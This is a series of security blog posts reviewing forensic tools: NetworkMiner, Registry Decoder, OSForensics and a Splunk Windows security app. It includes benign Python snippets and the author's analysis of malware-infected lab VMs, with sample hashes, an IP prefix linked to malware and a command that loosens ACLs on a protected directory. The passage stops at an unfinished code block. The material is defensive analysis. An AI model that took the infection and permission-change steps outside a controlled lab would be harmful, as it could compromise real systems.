Channel: HolisticInfoSec™

Tool review: NetworkMiner Professional 1.2

I've been slow in undertaking this review: NetworkMiner's Erik Hjelmvik sent me NetworkMiner Professional 1.1 when it was released, and 1.2 is now available.
Seeing Richard Bejtlich's discussion of Pro 1.2 got me off the schneid; I'll point you to his post as an ideal primer while I go into a bit deeper detail on some of NetworkMiner's power as well as what distinguishes Professional from the free edition.
I covered NetworkMiner in toolsmith in August 2008 back when it was version 0.84. Erik has accomplished all of his goals for improvement as identified in that article, including reporting, faster parsing of large PCAP files (0.735 MB/s at the command line), more protocols implemented, and PIPI (Port Independent Protocol Identification). NetworkMiner Professional 1.2 incorporates all of the above.
To exemplify NetworkMiner Professional's PIPI capabilities, I changed my lab web server port to 6667, then set NetworkMiner to grab a live capture while browsing to the reconfigured server.
Note: you need to Run as Administrator to grab the interface on Windows 7.
Sure, it's more likely that someone would hide evil traffic over port 80, but you get the point. As Richard said, "PIPI has many security implications for discovery and (preferably) denial of covert channels, back doors, and other policy-violating channels."
Note in Figure 1 that NetworkMiner Professional clearly differentiates the HTTP traffic even though it traversed port 6667.

Figure 1
I was a bit surprised to note that the Hosts view seen in Figure 1 did not indicate that any data was pushed as cleartext, although NetworkMiner unequivocally identified the admin/password combination I sent in both the Cleartext view and the Credentials view.
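NetworkMiner's PIPI implementation is its own, but the underlying idea is easy to sketch: classify a stream by payload content rather than by port. A toy illustration in Python (the signature list and function are my own invention, not NetworkMiner's actual algorithm):

```python
# Port-independent protocol identification (PIPI) sketch: classify a
# payload by its content, ignoring the TCP port it arrived on.
# Illustrative toy only -- not NetworkMiner's code.

HTTP_MARKERS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"HTTP/1.")
IRC_MARKERS = (b"NICK ", b"USER ", b"PRIVMSG ")

def identify_protocol(payload: bytes) -> str:
    """Guess the application protocol from the first bytes of a stream."""
    if payload.startswith(HTTP_MARKERS):
        return "HTTP"
    if payload.startswith(IRC_MARKERS):
        return "IRC"
    return "unknown"

# HTTP traffic is identified as HTTP even when carried over the IRC port (6667).
print(identify_protocol(b"GET /index.html HTTP/1.1\r\nHost: lab\r\n\r\n"))  # HTTP
```

Real classifiers weigh many more features (statistical byte distributions, bidirectional behavior), but the port never has to enter into it.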
I used an 18.8MB PCAP from the Xplico sample set as it includes a plethora of protocols and carve-able content with which to test NetworkMiner Professional.
Exporting results to CSV for reporting is as easy as File --> Export to CSV and selecting output of your choosing. As seen in Figure 2 I opted for Messages as NetworkMiner Professional cleanly carved out an MSN to Yahoo email session (HTTPS, anyone?).

Figure 2
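Because the export is plain CSV, it feeds downstream reporting scripts trivially. A minimal sketch of consuming such an export in Python; the column names below are invented placeholders, so check the header row of your actual export:

```python
import csv
import io

# Parse a NetworkMiner-style CSV export. The column names here are
# hypothetical placeholders; a real export defines its own header row.
sample_export = io.StringIO(
    "SourceHost,DestinationHost,Protocol,Message\n"
    "192.168.1.10,203.0.113.5,HTTP,hello from MSN\n"
)

for row in csv.DictReader(sample_export):
    print(f"{row['SourceHost']} -> {row['DestinationHost']}: {row['Message']}")
```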
Geo IP localization is a real standout too. You'll see it in play as you explore host details in Hosts view as seen in Figure 3.
Figure 3
You may find host coloring useful too should you wish to tag hosts for easy identification later as seen in Figure 4.

Figure 4
Finally, I am most excited about NetworkMinerCLI for command-line scripting support. 
I ran a PCAP taken from a VM infected with Trojan-Downloader.Win32.Banload.MC through NetworkMinerCLI and was amply rewarded for my efforts...right after I excluded the output directory from AV detection.
Figure 5 shows the command executed at the prompt coupled with the resulting assembled files and CSVs populated to the output directory as seen via Windows Explorer.

Figure 5
The assembled files included all the malicious binaries disguised as JPGs as downloaded from the evil server. File carving network forensic analysis juju with easy CLI scripting. Bonus!
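Catching "binaries disguised as JPGs" programmatically comes down to comparing a file's magic bytes against its claimed extension. A minimal sketch (the signature table is deliberately tiny; real tools carry hundreds of signatures):

```python
# Flag files whose content signature disagrees with their extension.
# Signature table abbreviated for illustration.
SIGNATURES = {
    b"MZ": "exe",           # Windows PE executable
    b"\xff\xd8\xff": "jpg", # JPEG
}

def sniff(data: bytes) -> str:
    """Return the file type implied by the leading magic bytes."""
    for magic, kind in SIGNATURES.items():
        if data.startswith(magic):
            return kind
    return "unknown"

def extension_mismatch(name: str, data: bytes) -> bool:
    """True when the content type is known and contradicts the extension."""
    claimed = name.rsplit(".", 1)[-1].lower()
    actual = sniff(data)
    return actual != "unknown" and actual != claimed

# A PE executable masquerading as an image:
print(extension_mismatch("update.jpg", b"MZ\x90\x00"))  # True
```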

In closing, NetworkMiner Professional 1.2 is a mature, highly useful tool and well worthy of consideration for purchase by investigators and analysts tasked with NFAT activity. 
I'm glad to provide further feedback via email and recommend you reach out to Erik as well via info [at] netresec.com if you have questions.







toolsmith: Registry Decoder









Prerequisites
Binaries require no external dependencies; working from a source checkout requires Python 2.6.x or 2.7.x and additional third-party apps and libraries.

Merry Christmas: "Christmas is not a time nor a season, but a state of mind. To cherish peace and goodwill, to be plenteous in mercy, is to have the real spirit of Christmas." -Calvin Coolidge

Introduction
Readers of the SANS Computer Forensics Blog or Harlan Carvey’s Windows Incident Response blog have likely caught wind of Registry Decoder. Harlan even went so far as to say “sounds like development is really ripping along (no pun intended). If you do any analysis of Windows systems and you haven't looked at this tool as a resource, what's wrong with you?” When Registry Decoder was first released in September 2011, I spotted it via Team Cymru’s Dragon News Bytes mailing list and filed it away for future use. Then, in most fortuitous fashion, Andrew Case, one of the Volatility developers I’d reached out to for September’s Volatility column, contacted me regarding Registry Decoder in early November. Andrew co-develops Registry Decoder with Lodovico Marziale as part of Digital Forensics Solutions and kindly provided me with content for the remainder of this introduction.

Registry Decoder is open source (GPL) and written completely in Python and is downloadable via Google Code projects. It was initially funded by the National Institute of Justice and now is funded by Digital Forensics Solutions.
Registry Decoder was devised to automate the acquisition, analysis, and reporting of registry contents. To accomplish this, there are actually two projects. The first is RegistryDecoder Live which allows for the safe acquisition of registry files from a live machine by forcing a system restore point, thus putting the currently active registry files into a read-only state in backup. It then reads these files from backup either in System Restore Points for XP or from the Volume Shadow Service on Windows Vista & Windows 7. As Registry Decoder Live acquires files, it creates a database that can then be imported into the second tool, Registry Decoder.
Registry Decoder can analyze registry files from a number of sources and then provide a number of GUI-driven analysis capabilities. The current version of the tool (1.1 as this is written) can import individual registry files, raw (dd) disk images, raw (dd) split images, Encase (E01) images, and databases from the live tool. Once evidence is imported and pre-processed, the investigator then has a number of analysis tools available and new evidence can be added to a case at any time.
Registry Decoder’s analysis capabilities include:
·         Browsing Hives (similar to Access Data’s Registry Viewer)
·         Hive Searching (more on this below)
·         Plugin System (similar to regripper)
·         Hive Differencing
·         Timelining based on last write time
·         Path Based Analysis
·         Automated reporting of all of the above
Registry Decoder automates all of this functionality for any number of registry hives and the reporting can handle exporting results from multiple hives and analysis types into one report.

Andrew’s favorite Registry Decoder use case is USBSTOR analysis. Almost every case involving investigating a specific employee requires determining which (if any) USB drives were in use.  To do this with Registry Decoder, all an investigator has to do is create a case with the disk images or hives acquired, run the USBSTOR plugin, and then export the results. After pre-processing is done, it takes mere minutes to have a report created with the device name, serial number, etc. of any devices connected. Also, since Registry Decoder pulls historical files from live machines and disk images (System Restore & Volume Shadow Service), this analysis can be run across hives going back months or years.
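For context, USBSTOR evidence lives under HKLM\SYSTEM\...\Enum\USBSTOR, where each device subkey name encodes vendor and product and the instance subkey beneath it holds the serial. A sketch of that parsing step in Python (the key path is a made-up example following the real naming convention):

```python
# Parse a USBSTOR subkey path into (vendor, product, serial).
# Paths follow the convention:
#   USBSTOR\Disk&Ven_<vendor>&Prod_<product>&Rev_<rev>\<serial>
# The example path below is invented for illustration.
def parse_usbstor(key_path: str) -> dict:
    device, serial = key_path.split("\\")[-2:]
    fields = dict(part.split("_", 1) for part in device.split("&") if "_" in part)
    return {"vendor": fields.get("Ven"),
            "product": fields.get("Prod"),
            "serial": serial}

rec = parse_usbstor(r"USBSTOR\Disk&Ven_SanDisk&Prod_Cruzer&Rev_1.26\0781556B&0")
print(rec["vendor"], rec["product"], rec["serial"])  # SanDisk Cruzer 0781556B&0
```

Registry Decoder's USBSTOR plugin does this (and more) for you across every hive in the case, historical copies included.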
Similarly, while investigating data exfiltration between multiple employees of a company, Andrew needed to know if they shared USB drives. To make the determination he took the SYSTEM files from each machine, loaded them into Registry Decoder, and then used the plugin differencing ability on the USBSTOR plugin. It immediately revealed what drives were shared between computers, including their serial numbers. Another common use of the differencing feature is with the Services plugin, as this quickly identifies malware if you difference your known good disk image vs. a disk image of a machine suspected to be infected.

Registry Decoder’s search feature is one of its strongest features. It allows you to search across any number of hives and filter by keys/values/names, last write time range, wildcard searching, and bulk searching with keyword files.
For a recent case, Andrew had to determine if a person was accessing files they shouldn’t have been looking at. They had a desktop and a laptop, both running XP and both with many System Restore Points. In less than 30 minutes with Registry Decoder, Andrew needed only load the disk images from the two machines into Registry Decoder, make a text file with all the search terms, and then search all the terms across all the hives in the case (including historical ones). This returned results that he then exported into one report, and he was finished. Another useful search capability: from the search results tab, right-click on any result and immediately jump into the Browse view positioned at that key.
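The bulk-search workflow reduces to: load wildcard patterns from a keyword file, test them against every key path in every hive, and report hits per hive. A sketch with invented hive data, using fnmatch for the wildcards:

```python
import fnmatch

# Bulk keyword search across hives: every wildcard term is tested
# against every key path. Hive names, paths, and terms are invented.
hives = {
    "desktop-SYSTEM": [r"ControlSet001\Services\WmdmPmSp",
                       r"ControlSet001\Enum\USBSTOR"],
    "laptop-NTUSER":  [r"Software\Microsoft\Windows\CurrentVersion\Run"],
}
keywords = ["*WmdmPmSp*", "*USBSTOR*"]  # one line per term in a keyword file

hits = [(hive, path)
        for hive, paths in hives.items()
        for path in paths
        for kw in keywords
        if fnmatch.fnmatch(path, kw)]

for hive, path in hits:
    print(f"{hive}: {path}")
```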

Another good use case includes path-based analysis which allows you to determine if a registry path exists in any number of files. For whichever files it is present in, one can then export the path and optionally its key/value pairs. This is extremely useful in two situations:
1.       Determining if certain software is installed (P2P, cracked software, etc.), as you can simply search any of the paths that the program creates and then export its key/values inclusive of when and where the software was installed.
2.       During malware analysis as most malware writes to the registry. Searching across numerous suspect systems for the malware’s path allows investigators to immediately determine the extent of infection.

Registry Decoder’s roadmap includes more analysis plugins and added support for memory analysis (integrate with Volatility’s existing in-memory registry functionality).
The developers also want to add support for analyzing previously deleted keys and name/value pairs within hives. The library utilized for enumerating hives, reglookup, already supports this functionality so it is just a matter of integration.


Running the Registry Decoder online acquisition component

I ran regdecoderlive32 on a 32bit Windows XP SP3 virtual machine infected with Lurid and regdecoderlive64 on a Windows 7 SP1 64bit machine.
One note for regdecoderlive32 on Windows XP systems with drives formatted as NTFS: even when running regdecoderlive32 with administrator privileges, the hidden System Volume Information directory is protected with unique ACLs. To circumvent this issue, issue cacls "C:\System Volume Information" /E /G <username>:F from a command prompt at the root of C: (this assumes the OS is installed on C:).
As seen in Figure 1, running regdecoderlive is as simple as executing and defining a few parameters including description, output directory (must be empty) and check boxes for acquisition of current and backup files.

Figure 1: Registry Decoder Live
Once acquisition is complete, the results directory will be populated with registryfiles/acquire_files.db and related files. This results directory can (should) be written to portable storage mounted on the target system or a network share, which can then be consumed by Registry Decoder for offline analysis.

Running the Registry Decoder offline analysis component

Registry Decoder can consume individual registry files, raw (dd) disk images, and Encase (E01) images, including split images. Building a case is as easy as adding a case name and number, investigator, comments, and case directory. Adding evidence to a case after initial processing is quite simple; you’ll be prompted to add new evidence after choosing Start Case and opening an existing case.
I only tested Registry Decoder with the acquisition database acquired from a Lurid-infected Windows XP VM via Registry Decoder Live.
Initial processing can take some time depending on the number of restore points or volume shadows.
Once initial processing is complete however, Registry Decoder is nimble and effective.
I mimicked some of Andrew’s use cases in this analysis of a Lurid victim. From runtime analysis of the Lurid sample I had (md5: 84d24967cb5cbacf4052a3001692dd54) I knew a few key attributes to test Registry Decoder with. Services and registry keys created include WmdmPmSp. As the search functionality is a strong suit, I selected CORE from the current snapshot acquired and searched WmdmPmSp. Right-click search results and select Switch to File View then navigate to the Browser tab for key values, etc. as seen in Figure 2.

Figure 2: Registry Decoder search results
I made use of the timeline functionality and was amply rewarded. Imagine a scenario where you have a ballpark time window for a malware compromise or unauthorized access. You can filter the timeline window accordingly and produce output compliant with the SleuthKit’s mactime format. It’s not human readable currently (next release) so read it in with Autopsy or TSK. Timeline gathering and results are combined in Figure 3. It clearly identified exactly when Lurid wrote to HKLM\SYSTEM\CONTROLSET001\SERVICES\WmdmPmSp.
Figure 3: Registry Decoder timeline results
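The mactime format in question is TSK's pipe-delimited bodyfile (MD5|name|inode|mode|uid|gid|size|atime|mtime|ctime|crtime); registry keys carry only a last-write timestamp, which maps naturally to the mtime slot. A sketch of emitting such lines (the key and epoch value are invented):

```python
# Emit registry key last-write times in TSK bodyfile format so
# mactime/Autopsy can render a timeline. Key path and epoch are invented.
keys = [
    (r"SYSTEM\ControlSet001\Services\WmdmPmSp", 1311600000),
]

def bodyfile_line(key_path: str, last_write_epoch: int) -> str:
    # Fields: MD5|name|inode|mode|uid|gid|size|atime|mtime|ctime|crtime.
    # Registry keys only have a last-write time, placed in the mtime slot;
    # inapplicable fields are zeroed.
    return "|".join(["0", key_path, "0", "0", "0", "0", "0",
                     "0", str(last_write_epoch), "0", "0"])

for path, ts in keys:
    print(bodyfile_line(path, ts))
```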
I also tested USBSTOR (unrelated to Lurid) on both acquisitions (Windows 7 and Windows XP) and the results were accurate and immediate in both cases, as seen in Figure 4.

Figure 4: Registry Decoder USBSTOR results
Explore the Plugins options included with Registry Decoder; the possibilities are endless. SYSTEM will provide you a nice summary overview as you begin, IE Typed URLs is great for inappropriate browser use, Services with Perform Diff enabled is excellent for malware hunting, System Runs will give you instant gratification regarding what’s configured to run on startup, ACMRU queries the registry keys that record what has been typed into the Windows Search dialog box, and on and on. Brilliant!

In Conclusion

I’m extremely excited about this tool and imagine its use at scale would be of incredible value for enterprise incident responders and forensic examiners. I’ve been chatting with Andrew at length while writing this and he continuously mentions pending features, including some visualization options and the aforementioned Volatility interaction. I can’t wait; check out Registry Decoder for yourself ASAP.
Merry Christmas!
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Andrew Case, Registry Decoder developer and project lead

Choose the 2011 Toolsmith Tool of the Year

Merry Christmas and Happy New Year!
It's that time again.
Please vote below to choose the best of 2011, the 2011 Toolsmith Tool of the Year.
We covered some outstanding information security-related tools in ISSA Journal's toolsmith during 2011; which one do you believe is the best?
I appreciate you taking the time to make your choice.
You can review all 2011 articles here for a refresher on any of the tools listed in the survey.
You can vote through January 31, 2012.
Results will be announced February 1, 2012.

toolsmith: ZeroAccess analysis with OSForensics




Prerequisites
Windows

Happy New Year:“A New Year's resolution is something that goes in one year and out the other.” - Author Unknown



Introduction
December is the time of year when I post the Toolsmith Tool of the Year survey for readers to vote on their favorite tool of the given year. Please do take a moment to vote. What’s nice is that I often receive inquiries from tool developers who would like consideration for coverage in toolsmith. David Wren, Managing Director of PassMark Software, caught me at just the right moment as I was topic hunting for this month’s column. PassMark, out of Sydney, Australia, has been known for benchmark and diagnostic tools but has recently dipped its toe in the digital forensics pool with OSForensics. I give PassMark props for snappy marketing. OSForensics, “Digital Investigation for a new era” coupled with the triumvirate of Discover, Identify, and Manage, makes for a good pitch, but as always we need tools that do as they say. So what can we expect from OSForensics? According to David, who provided me with prerequisite vendor/developer content, the pending 1.1 release of OSForensics expected in mid-January 2012 will include:
·         Inclusion of a tree view style file system browser (Windows Explorer replacement).
·         Indexing & searching of the contents of E-mail attachments. At the moment just the E-mail content and the file names of attachments are indexed.
·         Improvements to add search results to a case directly from search history (efficiency improvement)
·         Ability to add quick notes to a case. At the moment adding arbitrary notes is a 2 step process.
·         Improvements in the built-in image viewer. Better quality image scaling & more file properties.
·         Minor improvements in the way E-mails are exported
·         Significant speed improvements in the Windows registry browser
·         A bug fix for handling of dates in Spanish language E-mails.
·         Some minor documentation changes

Existing features include disk imaging, disk image mounting, raw hex view of disk,  manual carving, a registry viewer, forensic copy of network files, testing & zeroing of external drives prior to imaging, file hashing, live memory dumping, detection of files with wrong extensions via signatures, case management, reporting, 64bit  support, and more.
The OSForensics website has an extensive FAQ as well as excellent videos and tutorials.
Please note that there is a Free Edition and a Pro Edition. For this article I tested the 1.0 Pro version of OSForensics.

Integrating additional tools into OSForensics

One of the things I like most about OSForensics is the ability to plug in other tools. There’s a great tutorial for enhancing OSForensics with Harlan Carvey’s RegRipper that will give you a solid starting point for this activity. Friend and reader Jeff C. expressed interest in rootkit analysis this month so I’m going to use this opportunity to integrate GMER and RootkitRevealer into OSForensics.
As I ran OSForensics on a Windows XP system from a USB key, I copied GMER and RootkitRevealer to E:\OSForensics\AppData\SysInfoTools.
I then navigated to System Information in the OSForensics UI, selected Add List and created a Rootkit Analysis list, followed Add under Commands and added the command to execute GMER and RootkitRevealer as seen in Figure 1.
Figure 1: Rootkit Analysis tools added
Keep in mind, you can add any of your preferred tools to OSForensics and their execution as well as their output will be captured as part of OSForensics case management capabilities.

Running OSForensics

For ease of viewing, right-click the menu on the left side of the OSForensics UI and choose thin buttons as this will present all options without scrolling.
One note of interest before diving in: OSForensics allows installation on a base analysis system from which you can then Install to USB so as to run it from a USB key as part of your field kit as seen in Figure 2.

Figure 2: Install OSForensics to a USB key
Jeff, as part of his expressed interest in rootkit analysis, also provided me with a perfect sample with which to compromise my test system. Nomenclature for this little nugget includes Jorik and Sirefef, but you may know it best as Zaccess or ZeroAccess. To read a truly in-depth study of ZeroAccess, check out Giuseppe Bonfa’s fine work in four parts over at InfosecResources, as well as a recent update from Pedro Bueno on the ISC Diary. ZeroAccess has been rolled into the BlackHole Exploit Kit and is often used in crimeware bundles for ad clicking.
This particular sample (MD5: 3E6963E23A65A38C5D565073816E6BDC) is VMware-aware so I targeted my Windows XP SP3 system running Windows SteadyState and executed QuickTimeUpdate.exe (it only plays a real QuickTime update on TV).
As with any tool of OSForensics’ ilk, I started the process by creating a case, which is as easy as clicking Start then Create Case. The OSForensics UI is insanely intuitive and simple; if you’re one of those who refuses to read manuals, FAQs, and/or tutorials you’ll still get underway in short order. With most forensics-oriented multi-functional tools that include indexing I always make indexing my second process. Yep, it’s as easy as Create Index. I infected this system on 12/26/11 at 1630 hours so a great next step for me was to review Recent Activity to see what was noteworthy. Based on a date range-limited search under Recent Activity I noted a significant spike in events in the 1600 hour. I right-clicked on the resulting histogram for the hour of interest and selected Show these files. The result, as seen in Figure 3, shows all the cookies spawned when ZeroAccess tapped into all its preferred ad channels. All cookies in Figure 3, including those for switchadhub.com, demdex.com, and displayadfeed.com, were created right on the heels of the infection at 1630 hours. These are services malware writers use to track clicks and campaign success.

Figure 3: ZeroAccess’ malicious click campaign evidence via OSForensics
I had not browsed to any websites, and on this host would have done so via a browser other than Internet Explorer; as such this activity, as written to C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5, clearly occurred in the background.
I always take a network capture during malware runtime, and the resulting PCAP acquired while analyzing this version of ZeroAccess included connections to a well-known malware redirection service at 67.201.62.*. Search "67.201.62" malware and you’ll see what I mean.

I then opted to call GMER from OSForensics as discussed earlier during integration. If you’re not familiar with it, GMER is the de facto standard for rootkit detection. Once a GMER scan is complete, you can choose to dump detected modules as seen in Figure 4 via Dump module.

Figure 4: GMER bags ZeroAccess via OSForensics
I fed the resulting binary file to VirusTotal and was rewarded for my efforts with hits for Gen:Variant.Sirefef.38, a ZeroAccess variant.
OSForensics features a Memory Viewer from which you can conduct similar activity natively by selecting a given process (one you assume or have determined is malicious), select one of four dump options including Dump Process Memory Contents, then click Dump. The resulting .bin can be fed to VirusTotal or a similar service.
But alas, you will not have made the utmost use of OSForensics if you don’t capitalize on Hash Sets. I won’t get into great detail as to how to do so as, again, the tutorial videos are excellent. You will want to enable a given hash set by selecting it in the UI then clicking Make Active. One of the hash sets PassMark offers via download is a 124 KB common Keyloggers hash set. You can select a directory via File Name Search, then Search, then right-click a file of interest (or CTRL-A to select all) and choose Look Up in Hash Set. As none of the acquired binaries for ZeroAccess matched the current hash set, I chose to scan my Lurid (the APT) analysis folder to see what matches the hash set had for me. I used the Sorting menu in the lower right-hand corner of the UI and set it to In Hash Sets; the results are seen in Figure 5.

Figure 5: Keylogger hashset checks
While OSForensics claimed to have matches, they were only for 0 byte files that all show up with the MD5 hash of D41D8CD98F00B204E9800998ECF8427E. I’ll test this further with a known keylogger and determine what a real match looks like. I don’t fault OSForensics for this as I likely don’t have a sample keylogger whose hash matched the hash set. Trying hash matching against known good system files worked admirably.
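That hash is a telltale value: it's the MD5 of zero-length input, so every empty file shares it. It's worth filtering out empty files before any hash-set lookup, as this sketch shows:

```python
import hashlib

# MD5 of empty input -- the digest every zero-byte file shares, which
# explains spurious hash-set "matches" on empty files.
EMPTY_MD5 = hashlib.md5(b"").hexdigest()
print(EMPTY_MD5)  # d41d8cd98f00b204e9800998ecf8427e

def hashset_hits(files: dict, hash_set: set) -> list:
    """files maps name -> raw bytes; skip empty files, then return
    the names whose MD5 appears in hash_set."""
    return [name for name, data in files.items()
            if data and hashlib.md5(data).hexdigest() in hash_set]
```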

I didn’t even touch OSForensics password analysis capabilities but will also likely do so in a future blog post. Do check out that feature set via Passwords for yourself and share your feedback. Recognize that OSForensics integrates Rainbow Tables so, as you can imagine, the possibilities are endless.
Don’t forget the expected disk image analysis capabilities coupled with file carving. I tested this briefly (and successfully) only to confirm what I consider a required and standard feature for tools of this nature.

In Conclusion

I’ll admit I had no expectations for OSForensics as I had no prior experience with it and, to be quite candid, no awareness prior to David contacting me. I always assume some risk when choosing such a tool given that I could spend hours conducting research and analysis only to find the tool does not meet the standard for toolsmith discussion (can you say emergency topic change?). Such was not the case with OSForensics. I was pleased with the results, disappointed I didn’t have more time to spend on it before writing about it here, but looking forward to making much more use of it in the future. As always, let me know what you think; I’m hopeful you find it as intriguing as I have.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

David Wren, Managing Director, PassMark Software


STOP SOPA!

2011 Toolsmith Tool of the Year: OWASP ZAP



Congratulations to the OWASP ZAP team!
The Zed Attack Proxy is the 2011 Toolsmith Tool of the Year.
ZAP finished with 338 votes (36.5% of the total), slightly edging out Security Onion.
SO finished a strong second place with 328 votes (35.4%).
Volatility came in third with 152 (16.4%) and Armitage right on their heels in fourth with 148 votes (16%).

I am donating $50 to the OWASP ZAP project to honor this win.
I ask that those of you with the wherewithal and resources to do so please visit the project page and donate in any capacity you can.

Congratulations and thank you to all participants this year and I look forward to a strong 2012.










toolsmith: Splunk app - Windows Security Operation Center


Prerequisites
Windows 2003, 2008, 7

Introduction
As a volunteer handler for the SANS Internet Storm Center, I am privileged to work with some incredibly bright, highly capable information security professionals. As said individuals create new tools or update those they maintain I have the advantage of early awareness and access. Bojan Zdrnja’s Splunk app, Windows Security Operations Center (referred to as WSOC hereafter) is a perfect example. By the time you read this a new version should be available on Splunkbase.
Bojan brought me up to speed on his latest effort via email.
The latest version of WSOC contains bug fixes (mainly minor search tweaks) along with a couple of new dashboards:
1.       A dashboard for up-to-date servers with patches
2.       Directory Services dashboards
The Directory Services dashboards are very useful as they show changes to objects in AD including creations, deletions, and modifications. These views are excellent for auditors.
In the future Bojan plans to add support for other products normally found in Microsoft environments, including infrastructure elements such as DNS/DHCP, IIS, SQL server, and perhaps TMG. WSOC’s primary purpose is to cover all potential security views an auditor or information security personnel might want purview of; there’ll be no run-of-the-mill operational monitoring here ;-).
Bojan offered many favorite use cases. People are not always aware of what's going on in their Windows environments. In almost every implementation he’s encountered he found automated tools/services filling logs in abundance. As an example, when the tool tries to access a resource automatically, it generates an AD authentication failure event and then it successfully authenticates through NTLM. This causes logs to grow substantially. The same dashboards can be used to easily spot infected machines or brute force attacks on the network, thanks to Splunk's excellent visualization capabilities. WSOC includes a table that shows a distinct count of failed login attempts per username per machine, so if a machine is brute forcing, even if it's slow, you'll be able to see it.
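That brute-force table boils down to counting failures per (machine, username) pair; even a slow brute force accumulates on one pair while legitimate users do not. A sketch with invented event records (Splunk does this with a search-time `stats` aggregation, but the logic is the same):

```python
from collections import Counter

# Count failed logon attempts per (machine, username) pair; a slow
# brute force still stands out as one pair accumulating failures.
# Event records are invented for illustration.
events = [
    {"machine": "SRV01", "user": "administrator", "status": "failure"},
    {"machine": "SRV01", "user": "administrator", "status": "failure"},
    {"machine": "SRV01", "user": "bob", "status": "success"},
    {"machine": "WKS07", "user": "alice", "status": "failure"},
]

failures = Counter((e["machine"], e["user"])
                   for e in events if e["status"] == "failure")

for (machine, user), n in failures.most_common():
    print(f"{machine}\t{user}\t{n}")
```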
Auditors are particularly fond of the user/group management dashboards. They produce ready evidence, in one view, of which users were added to which group. When coupled with change requests, yours becomes an organization that is then better prepared for audits.
The dashboard showing installed services supports this well too as any installed service should have an accompanied change request (see further discussion below).
Bojan wanted to stress the missing patches dashboard as extremely valuable. This information is collected from the local Windows Update agent on every server. Of course, in order for it to be accurate, the Windows Update agent must be able to connect to WSUS or Microsoft's update server, but assuming it can, results will populate nicely showing servers that have missing patches and those that are all up to date.

Windows Security Operation Center installation

You’ll need a Splunk installation to make use of WSOC. I’ll assume you have some familiarity with Splunk and its installation. If not, ping me via russ at holisticinfosec dot org and I’ll send you a copy of a detailed Splunk article I wrote for Admin magazine in June 2010. You can also make use of the extensive online Splunk documentation resources.
A panoply of Splunk application goodness is available on the Splunkbase site, WSOC included. For the easiest installation method, from the Splunk UI, click App | Find More Apps…, then search Windows Security Operations Center followed by clicking the Install Free button.
Alternatively, if you’ve acquired the .tar.gz for the app you can, again via the Splunk UI, navigate to App | Manage Apps… | Install app from file and select the app from the location you’ve downloaded it to. Installation is also possible from the Splunk CLI.
Once installed WSOC will present itself from the Splunk menu under App as Windows Security Operations Center. Once you’ve navigated to the WSOC app, options will include:
·         About
o   Includes top sending servers, top source types, and contributing Domain Controllers (if applicable)
·         Login Events
o   Includes Active Directory, NTLM, and RDP successful and failed attempts
·         Directory services
o   Access and changes
·         User management
o   User Account and Group Management
·         Change Control
o   Advanced Activity Monitor
o   Windows Installations and Patch Status Overviews
o   Process Tracking
o   Time Synchronization
·         Windows firewall
o   Configuration changes
o   Allowed and blocked connections
o   Allowed and blocked binds
·         Saved Searches               
o   Preconfigured queries, too plentiful to list
·         Search
o   Standard Splunk search UI

You’ve got to remember to set your audit and logging policies to be sure they capture the appropriate level of success and failure in order to be properly indexed by Splunk from the Security event log. Recognize the profound differences between Windows Server 2003 and 2008, with special attention to Event IDs. WSOC is largely optimized for Windows 2008/7 event types but can be tuned for older versions if you know how to manage Splunk app configurations and query parameters.
Remember too that you can configure Splunk as a light forwarder (CLI only) on target Windows servers and send all events to a core Splunk collector running WSOC, thus aggregating all events in one index and UI. Note the 500MB a day limitation on the free version of Splunk.
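A forwarder setup along those lines might look like the following sketch; the hostname, port, and credentials are placeholders, and exact syntax varies by Splunk version, so consult the forwarding documentation before relying on it:

```shell
# On the central Splunk instance running WSOC: accept forwarded data on a
# listening port (9997 is conventional but arbitrary; credentials are
# placeholders).
splunk enable listen 9997 -auth admin:changeme

# On each monitored Windows server (light forwarder, CLI only): point it
# at the collector so all events aggregate in one index and UI.
splunk add forward-server collector.example.com:9997 -auth admin:changeme
```

Event log inputs themselves are enabled in the forwarder's inputs configuration; remember the free license's 500MB/day ceiling when sizing how many servers to aggregate.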

Using Windows Security Operations Center

I ran WSOC through its paces on a Windows Server 2003 virtual machine image that I literally had not touched in two years (prior snapshot: 9/11/09). With WSOC and Splunk installed I patched the VM and generated a number of different logon events via RDP and locally. I also made changes to users and groups as well as updated browsers, Flash, and Java.
WSOC smartly reported on all related activity.
Under Change Control | Windows Installation Overview I noted all installations that wrote to the security event log (the default WSOC monitored log source) as seen in Figure 1.

Figure 1: WSOC Windows installation details   
As configured out of the box, if an event is not written to the security event log WSOC will not pick it up. As Bojan said, this app is intended as a security auditor’s tool as opposed to an operational health tool.
The default search covers the last 7 days from query time, but the chronology drop-down menu offers a range from 15 minutes to All time. Licensed versions of Splunk can also leverage real-time reporting.
Process Tracking is also a great view to monitor on critical servers. Unwelcome or unfamiliar processes may jump out at you, particularly if you’ve baselined normal expectations for your systems.
I am currently not running Active Directory or a domain controller in my lab which left a lot of WSOC functionality testing off the table (Directory Services, etc.) but that should not preclude you from doing so. Via Local Users and Groups I added an evil user, deleted some users created during testing on the VM in 2009, and deleted a couple of non-essential groups. Evidence of the activity immediately presented itself via User management | User Account Management and Group Management as seen in Figure 2.

Figure 2: WSOC user account monitoring
It’s a tad unseemly for WSOC to label UI panes as Added Windows Domain accounts and Deleted Windows Domain accounts given that the activity was specific to local accounts, but you get the idea.
If you drill into View results you’ll receive all the detail not immediately available in the preliminary app pane.
Figure 3 shows WSOC nabbing me for having created the user Ima, short for Ima Hacker. :-)

Figure 3: Ima Hacker bagged and tagged
I love the Saved Search feature and, knowing I’d intentionally triggered one of those events, ran Windows – Server restarts for you as an example.
Results are noted in Figure 4, where you can see that the reboot was spawned by Internet Explorer (Windows Update).

Figure 4: WSOC captures system restarts 
Lastly, the Advanced Activity Monitor, under Change Control, offers search capability via unique identifiers. In Figure 5, you’ll see all the New added services attributed to my user account.

Figure 5: WSOC shows added services 
I did some customization of the app to capture Windows Server 2003 Windows Firewall-related events, but be aware that by default the app checks Event IDs 4946, 4947, 4948, 5156, 5157, 5158, and 5159 (Windows Server 2008 Event IDs). Enable Audit MPSSVC Rule-Level Policy Change on Windows 7 and 2008 for WSOC to capture Windows Firewall events correctly. Windows 2003 uses a different event code hierarchy that is not covered by WSOC but is easy enough to customize for if you’re still running 2003.
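As a sketch, the underlying search for those firewall events looks something like the following; the sourcetype shown is the Splunk default for Security event log inputs, but yours depends on how your inputs are configured:

```
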